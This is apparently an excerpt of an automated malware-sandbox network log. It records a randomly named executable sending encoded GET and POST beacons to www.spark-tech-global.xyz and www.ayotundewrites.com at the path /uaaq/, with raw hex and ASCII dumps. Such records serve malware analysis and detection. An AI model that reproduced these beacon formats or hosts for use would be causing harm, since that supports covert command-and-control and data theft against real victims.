                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    89192.168.11.3049849162.0.222.119803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:26.874689102 CET433OUTGET /uaaq/?XFs82=6R5Xx6907&9pG0L=uqX2CpJoJvwTFA+ZFtoTb/Viquue5JaT7gdpcN3qNHbjP1Cd4gItxtd6vZy9N0V5BOWbrcI9A+ppibdEzCLbbhznzUeV+CWA9w== HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:10:27.177002907 CET602INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:26 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    90192.168.11.304985083.229.19.76803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:32.357433081 CET710OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.ayotundewrites.com
                                                                                    Referer: http://www.ayotundewrites.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 4a 45 4b 44 6e 46 58 35 38 4e 76 54 32 43 54 4d 74 79 48 62 34 6f 51 4e 33 4f 68 78 6d 59 77 6c 59 4f 79 52 58 47 6c 68 6d 7a 68 70 36 4c 4b 32 33 4f 38 50 72 73 48 56 2b 36 56 78 34 58 6d 55 52 49 7a 4e 37 46 6f 4c 30 47 6e 79 33 4c 56 65 67 4b 71 49 4f 51 6a 41 75 4f 34 65 38 4a 79 69 47 51 38 4d 4d 59 64 67 69 70 77 45 4c 4c 30 63 67 77 37 41 48 68 72 73 54 77 30 4d 6f 57 76 33 78 78 31 54 39 46 61 32 59 35 75 32 4c 4a 33 74 49 49 38 6f 65 56 77 68 54 5a 52 78 38 45 53 61 6d 53 37 76 59 78 62 4b 66 78 4e 42 74 5a 4c 42 75 41 3d 3d
                                                                                    Data Ascii: 9pG0L=JEKDnFX58NvT2CTMtyHb4oQN3OhxmYwlYOyRXGlhmzhp6LK23O8PrsHV+6Vx4XmURIzN7FoL0Gny3LVegKqIOQjAuO4e8JyiGQ8MMYdgipwELL0cgw7AHhrsTw0MoWv3xx1T9Fa2Y5u2LJ3tII8oeVwhTZRx8ESamS7vYxbKfxNBtZLBuA==
                                                                                    Dec 4, 2023 12:10:32.535037994 CET1069INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Content-Encoding: gzip
                                                                                    Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~mqY=Zq/6RWArS3VPQ:YF{eu9Z(ON(/?[e'':!}~bwPb&REy&dtY>J_M?7+vRJpX4Jj\NS|V;iHf4@_lMNHI<JhW8DPRd2V&Yd<vZ%#wEA:052&.6FH>Q=9Tc}h@!1WwC)D!2PyzRY'L<Juy/A-+~\66HfQ1O2(qJT,SR?@91^XazY2Q9BKZuQ]71rJ^J_FxvfTSGcFFdh8-zDahdAl FCno&|T%HHwO7,[7Dt50


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    91192.168.11.304985183.229.19.76803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:35.060317993 CET730OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.ayotundewrites.com
                                                                                    Referer: http://www.ayotundewrites.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 4a 45 4b 44 6e 46 58 35 38 4e 76 54 33 69 6a 4d 2b 6b 50 62 2b 49 51 4f 72 65 68 78 2f 49 77 2b 59 4f 2b 52 58 43 63 73 6d 48 4e 70 2f 65 32 32 34 71 6f 50 6f 73 48 56 72 4b 56 30 32 33 6d 64 52 49 2f 6a 37 46 6b 4c 30 47 6a 79 33 4c 6c 65 6a 37 71 4c 50 41 6a 43 6f 4f 34 51 6b 70 79 69 47 51 38 4d 4d 63 39 47 69 70 6f 45 4c 37 45 63 69 55 50 44 4b 42 72 76 57 77 30 4d 73 57 76 7a 78 78 31 6c 39 45 32 59 59 37 6d 32 4c 49 48 74 4a 61 55 6e 56 56 77 37 4d 70 51 2f 74 6c 6a 77 71 41 37 55 56 77 6a 7a 47 45 31 52 6f 4d 6e 53 70 2b 5a 4c 33 31 44 30 62 6a 33 42 32 6d 7a 33 76 59 58 62 71 64 38 3d
                                                                                    Data Ascii: 9pG0L=JEKDnFX58NvT3ijM+kPb+IQOrehx/Iw+YO+RXCcsmHNp/e224qoPosHVrKV023mdRI/j7FkL0Gjy3Llej7qLPAjCoO4QkpyiGQ8MMc9GipoEL7EciUPDKBrvWw0MsWvzxx1l9E2YY7m2LIHtJaUnVVw7MpQ/tljwqA7UVwjzGE1RoMnSp+ZL31D0bj3B2mz3vYXbqd8=
                                                                                    Dec 4, 2023 12:10:35.237930059 CET1069INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Content-Encoding: gzip
                                                                                    Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~mqY=Zq/6RWArS3VPQ:YF{eu9Z(ON(/?[e'':!}~bwPb&REy&dtY>J_M?7+vRJpX4Jj\NS|V;iHf4@_lMNHI<JhW8DPRd2V&Yd<vZ%#wEA:052&.6FH>Q=9Tc}h@!1WwC)D!2PyzRY'L<Juy/A-+~\66HfQ1O2(qJT,SR?@91^XazY2Q9BKZuQ]71rJ^J_FxvfTSGcFFdh8-zDahdAl FCno&|T%HHwO7,[7Dt50


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    92192.168.11.304985283.229.19.76803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:10:37.762887001 CET1647OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.ayotundewrites.com
                                                                                    Referer: http://www.ayotundewrites.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 4a 45 4b 44 6e 46 58 35 38 4e 76 54 33 69 6a 4d 2b 6b 50 62 2b 49 51 4f 72 65 68 78 2f 49 77 2b 59 4f 2b 52 58 43 63 73 6d 48 46 70 2f 49 69 32 33 72 6f 50 70 73 48 56 71 4b 56 31 32 33 6e 66 52 49 6e 76 37 46 34 62 30 45 4c 79 34 4b 46 65 6d 49 79 4c 42 41 6a 43 71 4f 34 64 38 4a 79 4e 47 55 67 49 4d 59 52 47 69 70 6f 45 4c 39 67 63 78 67 37 44 49 42 72 73 54 77 30 51 6f 57 76 4c 78 78 4e 31 39 45 79 6d 59 71 47 32 4f 59 58 74 4f 75 30 6e 4a 46 77 6c 4e 70 52 69 74 6c 76 72 71 41 33 79 56 77 58 56 47 44 5a 52 72 62 65 36 35 73 42 77 69 32 2f 46 4b 6a 66 35 33 52 48 4e 33 62 66 41 77 72 39 55 4c 4a 31 72 54 64 58 76 65 64 73 44 55 6b 6c 78 42 76 6a 45 44 42 52 62 32 53 66 35 4f 50 30 47 6d 5a 6f 66 34 41 7a 72 59 74 62 77 5a 42 44 72 69 39 67 47 36 51 6b 4e 6c 77 62 2b 32 44 4f 72 78 43 5a 37 68 55 7a 47 2b 35 65 50 61 4d 6a 6e 73 68 6e 43 66 47 66 53 34 78 7a 43 4a 41 50 6e 69 70 48 45 6c 65 6d 30 76 46 2b 2b 47 32 50 54 69 70 77 51 64 41 6a 62 65 6e 59 52 42 38 48 69 50 68 5a 36 48 41 4e 75 51 73 72 4a 44 63 4b 30 68 4c 70 55 72 31 62 66 66 57 67 4f 71 79 50 67 52 47 6c 4e 70 77 78 4f 79 4a 75 63 74 2b 73 6c 42 4d 52 63 42 6a 32 4c 4c 64 53 6a 35 38 32 79 77 6e 65 79 6c 51 31 31 38 33 31 79 6c 59 45 7a 35 63 43 59 2f 63 75 58 75 6a 45 67 37 66 4a 63 42 4a 6b 74 44 68 2b 33 69 32 46 49 4c 56 48 63 38 69 64 5a 49 35 30 37 72 6d 6b 59 71 30 67 57 77 75 44 4c 62 65 6a 35 38 39 59 68 4b 5a 75 57 32 34 58 66 53 4c 43 6b 76 41 6c 74 34 39 69 4f 73 57 4b 48 63 6f 61 4a 34 52 50 2b 2b 4c 6f 68 39 46 6e 66 42 41 52 79 45 6c 50 56 45 37 70 56 4f 54 73 5a 72 6a 46 50 66 35 47 75 49 45 6c 65 63 57 69 47 67 4a 37 59 42 61 71 63 6b 61 51 61 2b 59 71 45 42 7a 43 38 4b 48 7a 42 68 56 78 33 38 5a 7a 5a 66 48 4e 48 4f 63 58 2f 46 79 36 69 66 51 6c 6c 53 70 76 30 75 44 64 52 54 6b 4f 67 6f 52 33 4e 79 38 62 76 31 33 4b 6d 4e 6c 6c 33 51 2b 75 6b 6e 56 47 36 54 53 6d 70 48 70 54 58 45 41 35 47 70 4e 50 79 7a 49 4c 4a 43 75 42 65 44 41 4c 44 4a 68 31 66 69 66 70 6a 39 79 42 72 33 46 48 6e 49 58 77 6b 6c 4f 5a 7a 56 34 6a 50 79 41 47 38 78 70 36 35 50 64 4f 57 73 2b 2b 51 31 38 54 4a 67 4b 2b 56 36 51 54 6e 41 4c 53 77 2f 37 51 42 44 35 59 56 71 6b 50 55 64 65 78 53 32 31 47 50 6e 39 4f 69 4d 68 2b 4b 54 49 4a 75 34 47 61 66 45 67 39 6e 52 78 7a 33 46 54 4c 4d 38 59 4e 59 36 4c 5a 51 57 53 70 68 78 71 6b 34 37 6b 73 34 30 6b 43 33 76 2f 63 30 62 6d 41 33 70 57 72 2b 45 36 4c 68 2f 74 6d 4e 74 39 39 72 4f 76 6f 57 59 5a 6d 6c 4d 7a 45 31 61 33 39 6a 79 45 46 48 55 45 2f 6a 37 50 2b 4b 30 73 46 69 4c 66 6c 4d 71 44 58 44 53 6d 6f 39 5a 6a 4f 4e 36 54 44 5a 2f 2b 32 52 78 6a 64 63 6f 44 52 5a 4f 48 42 6a 38 5a 68 32 30 41 62 77 55 46 66 64 64 36 45 6b 52 79 70 68 6f 71 56 6d 41 69 73 47 47 61 49 44 31 75 70 44 6e 33 39 6d 62 71 4e 41 6c 6b 32 6d 49 36 4f 73 2b 5a 62 37 6f 56 63 73 61 71 39 4c 63 4f 46 6d 56 54 70 4d 33 6a 61 77 42 6b 56 65 41 48 72 73 57 6d 41 2f 50 51 41 43 57 63 79 71 70 37 72 34 4b 32 50 77 47 39 7a 57 51 2b 35 44 52 4b 52 56 44 72 2b 6e 53 2f 4f 52 68 66 48 30 33 5a 6b 66 54 61 50 47 35 39 78 47 4a 78 43 46 77 70 6a 7a 62 5a 49 6c 71 41 33 4d 45 37 65 38 7a 68 54 44 47 70 37 66 44 33 35 31 74 31 68 30 67 43 6f 75 39 50 5a 4d 6f 56 32 55 6f 79 78 51 41 74 68 32 68 67 63 39 6b 61 2f 6b 42 5a 34 4c 65 75 61 34 6a 42 48 6b 52 38 6e 72 52 6e 79 54 71 36 54 36 5a 78 55 42 61 54 72 6b 6c 4d 33 48
                                                                                    Data Ascii: 9pG0L=JEKDnFX58NvT3ijM+kPb+IQOrehx/Iw+YO+RXCcsmHFp/Ii23roPpsHVqKV123nfRInv7F4b0ELy4KFemIyLBAjCqO4d8JyNGUgIMYRGipoEL9gcxg7DIBrsTw0QoWvLxxN19EymYqG2OYXtOu0nJFwlNpRitlvrqA3yVwXVGDZRrbe65sBwi2/FKjf53RHN3bfAwr9ULJ1rTdXvedsDUklxBvjEDBRb2Sf5OP0GmZof4AzrYtbwZBDri9gG6QkNlwb+2DOrxCZ7hUzG+5ePaMjnshnCfGfS4xzCJAPnipHElem0vF++G2PTipwQdAjbenYRB8HiPhZ6HANuQsrJDcK0hLpUr1bffWgOqyPgRGlNpwxOyJuct+slBMRcBj2LLdSj582ywneylQ11831ylYEz5cCY/cuXujEg7fJcBJktDh+3i2FILVHc8idZI507rmkYq0gWwuDLbej589YhKZuW24XfSLCkvAlt49iOsWKHcoaJ4RP++Loh9FnfBARyElPVE7pVOTsZrjFPf5GuIElecWiGgJ7YBaqckaQa+YqEBzC8KHzBhVx38ZzZfHNHOcX/Fy6ifQllSpv0uDdRTkOgoR3Ny8bv13KmNll3Q+uknVG6TSmpHpTXEA5GpNPyzILJCuBeDALDJh1fifpj9yBr3FHnIXwklOZzV4jPyAG8xp65PdOWs++Q18TJgK+V6QTnALSw/7QBD5YVqkPUdexS21GPn9OiMh+KTIJu4GafEg9nRxz3FTLM8YNY6LZQWSphxqk47ks40kC3v/c0bmA3pWr+E6Lh/tmNt99rOvoWYZmlMzE1a39jyEFHUE/j7P+K0sFiLflMqDXDSmo9ZjON6TDZ/+2RxjdcoDRZOHBj8Zh20AbwUFfdd6EkRyphoqVmAisGGaID1upDn39mbqNAlk2mI6Os+Zb7oVcsaq9LcOFmVTpM3jawBkVeAHrsWmA/PQACWcyqp7r4K2PwG9zWQ+5DRKRVDr+nS/ORhfH03ZkfTaPG59xGJxCFwpjzbZIlqA3ME7e8zhTDGp7fD351t1h0gCou9PZMoV2UoyxQAth2hgc9ka/kBZ4Leua4jBHkR8nrRnyTq6T6ZxUBaTrklM3H
                                                                                    Dec 4, 2023 12:10:37.941420078 CET1069INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:10:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Content-Encoding: gzip
